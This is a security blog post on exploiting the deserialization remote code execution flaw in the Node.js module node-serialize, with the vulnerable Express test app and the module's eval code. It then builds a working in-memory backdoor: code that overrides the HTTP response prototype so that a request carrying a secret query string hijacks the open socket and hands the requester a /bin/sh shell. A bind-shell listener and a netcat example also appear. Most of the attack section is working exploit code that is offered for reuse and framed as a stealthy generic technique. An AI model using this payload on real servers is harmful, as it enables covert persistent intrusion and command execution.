Several days ago I noticed a blog post on the opsecx blog talking about exploiting a RCE (Remote Code Execution) bug in a nodejs module called node-serialize. The blog post explains pretty clearly what's wrong with the module in question but one thing that strikes me is how complex the exploitation process was with Burp. No offence to Burp - it is a great tool - but I think we can do better.

In this post I would like to show my take on this particular RCE and also perhaps share additional insight that may prove to be helpful in the future - perhaps in your own research.

Attack Surface

Before we begin it will be useful to evaluate the attack surface first. The node-serialize module is modestly used. At the time of writing it had about 2000 downloads per month and 9 dependants without any sub-dependants.

Here is a list of all dependant modules: cdlib, cdlibjs, intelligence, malice, mizukiri, modelproxy-engine-mockjs, node-help, sa-sdk-node, scriby, sdk-sa-node, shelldoc, shoots. Without analysing the code there is no way for identifying if these implementations are also vulnerable, but due to the nature of the vulnerability I will assume they are.

Though, more importantly, we haven't answered the question on how wide-spread this module actually is. 2000 downloads per month could mean many things and it is hard to gauge the number of applications behind this number. A quick look at github and google is the only way to get some answers and this is where things start to get interesting.

A GitHub search echoes 97 potentially vulnerable public modules/applications which are most likely used privately due to not being enlisted on npmjs.com. Skimming through the code provides a sense of understanding how wide-spread (or not) the problem is. I was surprised to find out that it has something to do with Pokémon. Go figure!

I will throw in support for https://nodesecurity.io here because it is the only way to keep on top of situations like this one especially when the NodeJS module system is concerned. It is free for open-source projects.

Testing Environment

So far we figured that we are dealing with a bug with somewhat limited potential for abuse, which is good from public safety point of view. Let's move into the more academic side of things and exploit it. In order to test the bug we need a vulnerable application. The opsecx have one so we will use it in this exercise as well. The code is fairly straightforward.

var express = require ( 'express' ); var cookieParser = require ( 'cookie-parser' ); var escape = require ( 'escape-html' ); var serialize = require ( 'node-serialize' ); var app = express(); app.use(cookieParser()) app.get( '/' , function ( req, res ) { if (req.cookies.profile) { var str = new Buffer(req.cookies.profile, 'base64' ).toString(); var obj = serialize.unserialize(str); if (obj.username) { res.send( "Hello " + escape (obj.username)); } } else { res.cookie( 'profile' , "eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5IjoiYmFuZ2Fsb3JlIn0=" , { maxAge : 900000 , httpOnly : true }); res.send( "Hello stranger" ); } }); app.listen( 3000 );

You will need the following pacakge.json file to get it going (do npm install).

{ "dependencies" : { "cookie-parser" : "^1.4.3" , "escape-html" : "^1.0.3" , "express" : "^4.14.1" , "node-serialize" : "0.0.4" } }

So let's skip to the actual thing. As you can see from the code, this example web app is setting a cookie with the user profile, which is a serialised object using the vulnerable node module. This is all encoded in base64. To get an idea what the base64 string looks when unpacked we can get to utilise the ENcoder.

This looks like standard JSON. Looks can be deceiving sometimes. We will get to this later. First, let's setup Rest so that we can test it out. Notice that we are using the Cookie builder to get the correct encoding and that we are utilising the Encode gadget to convert the JSON string into Base64 format.

Exploit Setup

Now we have a working request which we will convert into an exploit. The first thing to do is to understand how exactly the vulnerability in node-serialize works. Looking at the source code it is pretty evident that the module will serialise functions as shown over here.

} else if ( typeof obj[key] === 'function' ) { var funcStr = obj[key].toString(); if (ISNATIVEFUNC.test(funcStr)) { if (ignoreNativeFunc) { funcStr = 'function() {throw new Error("Call a native function unserialized")}' ; } else { throw new Error ( 'Can\'t serialize a object with a native function property. Use serialize(obj, true) to ignore the error.' ); } } outputObj[key] = FUNCFLAG + funcStr; } else {

The issue will manifestate as soon as we call the unserialize method. The exact line is over here.

if (obj[key].indexOf(FUNCFLAG) === 0 ) { obj[key] = eval ( '(' + obj[key].substring(FUNCFLAG.length) + ')' ); } else if (obj[key].indexOf(CIRCULARFLAG) === 0 ) {

This means that if we create a JSON object with an arbitrary parameter which contains a value that begins with _$$ND_FUNC$$_ we get remote code execution because it will eval. To test this we can use the following setup.

If successful, and it should be successful, you will get an error back because the server will exit before the request is completed. Now we have remote code execution but we can do better.

Our Pivot

I find the exploitation technique presented in the opsecx blog a bit crud for my likings. It is perfectly fine for demonstration purposes but given that we have already achieved eval inside a node process there are many things that we can do in order to pull a more elegant hack without the need to involve python and stage the attack. Since we are going to write several large code blocks we may as well modify our working exploit so that it is easier to work with. For that we will use variables. Go into the Variables tab and setup a new variable called code.

This is going to store our code so that we don't have to worry about encodings. Now all we have to do is modify the profile cookie so that the code variable is embedded following the correct encoding for both JSON and the special way node-serialize does functions.

This is beautiful! Now every time we change the code variable the profile cookie payload will dynamically change by keeping the chain of encodings and the node-serialize magic to make it all perfect.

In-memory Backdoor

We need to work on our code payload. Assuming that we don't know how the app works, we need a generic way of exploiting it, or for that matter any other application, without prior knowledge of the environment or the setup. This means that we cannot rely on global scope variables that may or may not exist. We cannot rely that the express app is exported therefore it can be accessed for additional routes to be installed. We don't want to spawn new ports or reverse shell in order to keep minimal profile, etc.

This is a big list of requirements to satisfy but after some research it is easy to find a way this could work.

Our journey starts by taking a reference to ServerResponse function from the http module. The prototype of ServerResponse is used as the __proto__ of response object in expressjs.

var res = module .exports = { __proto__ : http.ServerResponse.prototype };

This means that if we change the prototype of ServerResponse that will reflect into the __proto__ of the response. The send method from the response object calls into the ServerResponse prototype.

if (req.method === 'HEAD' ) { this .end(); } else { this .end(chunk, encoding); }

This means that once the send method is invoked, a call to the end method will be made which happens to be coming from the prototype of ServerResponse. Since the send method is used sufficiently for pretty much anything expressjs related, this also means that we now have a direct way to quickly gain access to more interesting structures such as the current open socket. If we override the end method of the prototype this means that we can get a reference to the socket object from the this reference.

The code to achieve this effect will look like this.

require ( 'http' ).ServerResponse.prototype.end = ( function ( end ) { return function ( ) { } })( require ( 'http' ).ServerResponse.prototype.end)

Since we are overriding the prototype of end we also need to somehow differentiate our startup request from any other request as this may result in some unexpected behaviour. We will check the query parameter for a special string (abc123) that will tell us that this is our own evil request. This information can be retrieved accessing the httpMessage object from the socket like this.

require ( 'http' ).ServerResponse.prototype.end = ( function ( end ) { return function ( ) { } })( require ( 'http' ).ServerResponse.prototype.end)

Now we have everything lined up. What is left is to start the shell. In node this is relatively straightforward.

var cp = require ( 'child_process' ) var net = require ( 'net' ) net.createServer( ( socket ) => { var sh = cp.spawn( '/bin/sh' ) sh.stdout.pipe(socket) sh.stderr.pipe(socket) socket.pipe(sh.stdin) }).listen( 5001 )

After we merge both segments, the final code looks like this. Notice how we redirect the end function to spawn a shell within node by reusing the already established socket. This is pure fun!

require ( 'http' ).ServerResponse.prototype.end = ( function ( end ) { return function ( ) { if ( this .socket._httpMessage.req.query.q === 'abc123' ) { var cp = require ( 'child_process' ) var net = require ( 'net' ) var sh = cp.spawn( '/bin/sh' ) sh.stdout.pipe( this .socket) sh.stderr.pipe( this .socket) this .socket.pipe(sh.stdin) } else { end.apply( this , arguments ) } } })( require ( 'http' ).ServerResponse.prototype.end)

Now open netcat to localhost 3000 and type the following request

$ nc localhost 3000 GET /?q=abc123 HTTP/1.1 ls -la

What? That get's you nowhere. This is a little gotcha that I wanted to cover separately. You see, we are hijacking an existing socket and as such we are not the only custodians of the beast. There are other things probably responding to that socket as well so we need to make sure we take care of them. Luckily this is easy to achieve with a bit of knowledge how node sockets work. The final code will look like this.

require ( 'http' ).ServerResponse.prototype.end = ( function ( end ) { return function ( ) { if ( this .socket._httpMessage.req.query.q === 'abc123' ) { [ 'close' , 'connect' , 'data' , 'drain' , 'end' , 'error' , 'lookup' , 'timeout' , '' ].forEach( this .socket.removeAllListeners.bind( this .socket)) var cp = require ( 'child_process' ) var net = require ( 'net' ) var sh = cp.spawn( '/bin/sh' ) sh.stdout.pipe( this .socket) sh.stderr.pipe( this .socket) this .socket.pipe(sh.stdin) } else { end.apply( this , arguments ) } } })( require ( 'http' ).ServerResponse.prototype.end)

And finally we are here. Now we can take advantage of this vulnerability whenever we like. A remote shell can be obtained by opening a request with our special string utilising the same server process and established socket.

Conclusion

We started with a simple RCE vulnerability and ended up creating a generic way of spawning a shell across an already established HTTP channel, which should work independently in many types of situations, with a few caveats which I will leave for you to figure out. The best part of the whole thing is that the exploitation process was made simple with the help of Rest, which undoubtedly has been the star of the show in the last several posts: 1, 2, 3.